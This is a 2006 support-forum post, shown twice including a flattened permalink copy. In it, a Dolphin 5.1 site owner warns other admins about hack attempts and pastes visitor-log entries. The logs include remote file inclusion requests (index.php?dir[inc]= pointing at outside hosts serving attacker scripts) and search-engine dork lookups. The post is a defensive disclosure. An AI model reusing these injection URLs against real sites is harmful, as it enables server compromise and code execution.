ModMySite Support Forum - View Single Post

sillywabbit · 08-23-2006

Hi guys....
(Please forgive me Smoge if this is not good to post or the wrong place to post it).

I am posting this just for an FYI... especially to those who maybe running dolphin 5.1

I have had SEVERAL hack attempts on my site the last few days. I have also had alot of issues with spammers (now have up the .htaccess file... thanx guys!!). Because of the issues with the spammers, I was keeping a close eye on the stats. I noticed that I was getting several hits from searches coming from various search engines with the keywords being "2002-2006. product of boonex group."...... I thought this was rather strange.

Then I began noticing some file manipulation tactics in the stats and so I contacted my hosting company (I am a new customer with hostgator.com and a happy one!!).
Hostgator showed me that there is an exploit in 5.1
look here:
http://securitytracker.com/alerts/2006/Aug/1016692.html

I noticed that most of the IPs were in Amsterdam and Asia. I am hoping that the .htaccess file will take care of most of the banning of the IPs. Lots of bandwidth has been getting chewed by the hack attempts and the spammers

I guess that hack attempts are always going to be inevitable... but to be honest... has left me feeling a bit shaken up.

This is what they looked like in the latest visitor stats:

Host: 85.249.133.178 /favicon.ico
Http Code: 404 Date: Aug 22 14:15:37 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7

|
|
|
/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://forbidden-instincts.com/x?
Http Code: 406 Date: Aug 22 14:16:42 Http Version: HTTP/1.1 Size in Bytes: 382
Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7

Host: 84.244.143.59 /favicon.ico
Http Code: 404 Date: Aug 22 13:46:11 Http Version: HTTP/1.0 Size in Bytes: -
Referer: -
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

|
|
|
/templates/tmpl_dfl/scripts/index.php?img=2
Http Code: 200 Date: Aug 22 13:47:21 Http Version: HTTP/1.0 Size in Bytes: 419
Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

|
|
|
/templates/tmpl_dfl/scripts/index.php?img=1
Http Code: 200 Date: Aug 22 13:47:21 Http Version: HTTP/1.0 Size in Bytes: 419
Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

|
|
|
/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://amrdiab.ir/cgi-bin/hadi.txt%3f
Http Code: 200 Date: Aug 22 13:47:25 Http Version: HTTP/1.0 Size in Bytes: 421
Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

Host: 202.154.186.30 /about_us.php
Http Code: 200 Date: Aug 22 12:39:08 Http Version: HTTP/1.0 Size in Bytes: 14508
Referer: http://a9.com/%22powered%20by%20Dolphin%22?pm=3
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

|
|
|
/templates/tmpl_dfl/css/general.css
Http Code: 200 Date: Aug 22 12:39:15 Http Version: HTTP/1.0 Size in Bytes: 12665
Referer: http://www.christiandatingandchat.com/about_us.php
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

|
|
|
/templates/tmpl_dfl/css/anchor.css
Http Code: 200 Date: Aug 22 12:39:28 Http Version: HTTP/1.0 Size in Bytes: 503
Referer: http://www.christiandatingandchat.com/about_us.php
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

|
|
|
/favicon.ico
Http Code: 404 Date: Aug 22 12:39:35 Http Version: HTTP/1.0 Size in Bytes: -
Referer: -
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

|
|
|
/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://redhat.scient.co.jp/manual/crb.jpg?
Http Code: 200 Date: Aug 22 12:40:57 Http Version: HTTP/1.0 Size in Bytes: 4868
Referer: -
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

08-23-2006	#1 (permalink)
sillywabbit Join Date: May 2006 Posts: 118	Hack Attempts Hi guys.... (Please forgive me Smoge if this is not good to post or the wrong place to post it). I am posting this just for an FYI... especially to those who maybe running dolphin 5.1 I have had SEVERAL hack attempts on my site the last few days. I have also had alot of issues with spammers (now have up the .htaccess file... thanx guys!!). Because of the issues with the spammers, I was keeping a close eye on the stats. I noticed that I was getting several hits from searches coming from various search engines with the keywords being "2002-2006. product of boonex group."...... I thought this was rather strange. Then I began noticing some file manipulation tactics in the stats and so I contacted my hosting company (I am a new customer with hostgator.com and a happy one!!). Hostgator showed me that there is an exploit in 5.1 look here: http://securitytracker.com/alerts/2006/Aug/1016692.html I noticed that most of the IPs were in Amsterdam and Asia. I am hoping that the .htaccess file will take care of most of the banning of the IPs. Lots of bandwidth has been getting chewed by the hack attempts and the spammers I guess that hack attempts are always going to be inevitable... but to be honest... has left me feeling a bit shaken up. This is what they looked like in the latest visitor stats: Host: 85.249.133.178 /favicon.ico Http Code: 404 Date: Aug 22 14:15:37 Http Version: HTTP/1.1 Size in Bytes: - Referer: - Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 \| \| \| /templates/tmpl_dfl/scripts/index.php?dir[inc]=http://forbidden-instincts.com/x? Http Code: 406 Date: Aug 22 14:16:42 Http Version: HTTP/1.1 Size in Bytes: 382 Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/ Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 Host: 84.244.143.59 /favicon.ico Http Code: 404 Date: Aug 22 13:46:11 Http Version: HTTP/1.0 Size in Bytes: - Referer: - Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 \| \| \| /templates/tmpl_dfl/scripts/index.php?img=2 Http Code: 200 Date: Aug 22 13:47:21 Http Version: HTTP/1.0 Size in Bytes: 419 Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/ Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 \| \| \| /templates/tmpl_dfl/scripts/index.php?img=1 Http Code: 200 Date: Aug 22 13:47:21 Http Version: HTTP/1.0 Size in Bytes: 419 Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/ Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 \| \| \| /templates/tmpl_dfl/scripts/index.php?dir[inc]=http://amrdiab.ir/cgi-bin/hadi.txt%3f Http Code: 200 Date: Aug 22 13:47:25 Http Version: HTTP/1.0 Size in Bytes: 421 Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/ Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 Host: 202.154.186.30 /about_us.php Http Code: 200 Date: Aug 22 12:39:08 Http Version: HTTP/1.0 Size in Bytes: 14508 Referer: http://a9.com/%22powered%20by%20Dolphin%22?pm=3 Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 \| \| \| /templates/tmpl_dfl/css/general.css Http Code: 200 Date: Aug 22 12:39:15 Http Version: HTTP/1.0 Size in Bytes: 12665 Referer: http://www.christiandatingandchat.com/about_us.php Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 \| \| \| /templates/tmpl_dfl/css/anchor.css Http Code: 200 Date: Aug 22 12:39:28 Http Version: HTTP/1.0 Size in Bytes: 503 Referer: http://www.christiandatingandchat.com/about_us.php Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 \| \| \| /favicon.ico Http Code: 404 Date: Aug 22 12:39:35 Http Version: HTTP/1.0 Size in Bytes: - Referer: - Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 \| \| \| /templates/tmpl_dfl/scripts/index.php?dir[inc]=http://redhat.scient.co.jp/manual/crb.jpg? Http Code: 200 Date: Aug 22 12:40:57 Http Version: HTTP/1.0 Size in Bytes: 4868 Referer: - Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 __________________ http://www.christiandatingandchat.com Abledating 2.4.11A http://www.thefuzzypeach.com/dating 6.02 ****************** It's not the load that breaks you down; it's the way you carry it. --Lena Horne ******************